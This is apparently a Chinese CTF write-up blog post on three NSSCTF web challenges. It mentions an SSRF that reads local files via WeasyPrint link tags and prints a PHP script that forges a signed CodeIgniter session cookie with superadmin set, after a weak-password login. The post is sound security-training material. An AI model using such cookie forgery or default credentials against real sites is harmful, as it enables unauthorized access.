NSSCTF Round#20 Basic

发表于2024-03-31 | 更新于 2024-05-11 | 默认分类

| 字数总计: 1484 | 阅读时长: 1分钟 | 阅读量: 158

真亦假，假亦真

以为是php，没想到是java，直接扫目录
2024-03-30T05:41:28.png

CSDN_To_PDF V1.2

出题人wp
这所谓的hint感觉就是出题人的脑洞，根本想不到
2024-03-31T04:55:43.png
最近在学web前端，Link标签在html里一般都是用来引入本地的css样式表，WeasyPrint会解析link，从而可以ssrf读本地的任意文件，但是firefox下载的都是这种的，要用edge下，不知道为什么
2024-03-31T05:31:57.png
后面就直接跟出题人wp
2024-03-31T05:31:06.png

BabyCodeIgniter

首先弱密码admin/123456登录，有传文件的功能，但要superamdin，cookie里直接改没用，有hash进行验证
出题人wp，直接用他的php脚本，主要就是得知道靶机这个版本用的加密方法

<?php
$sessid = '';
while (strlen($sessid) < 32)
{
    $sessid .= mt_rand(0, mt_getrandmax());
}
$encryption_key="123456";
$data = array(
    'username' => 'admin',
    'password' => '123456',
    'is_logged_in' => true,
    'session_id'    => md5(uniqid($sessid, TRUE)),
    'ip_address'    => '127.0.0.1',
    'user_agent'    => 'huahua',
    'last_activity'    => time(),
    'superadmin' => true
);

$cookie_data = serialize($data);
$cookie_data .= hash_hmac('sha1',$cookie_data,$encryption_key);
echo urlencode($cookie_data);
?>

作者: CHHHCHHOH

文章链接: http://www.chhhchhoh.cn/index.php/archives/561/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自Hello World! ！

无标签

相关推荐

评论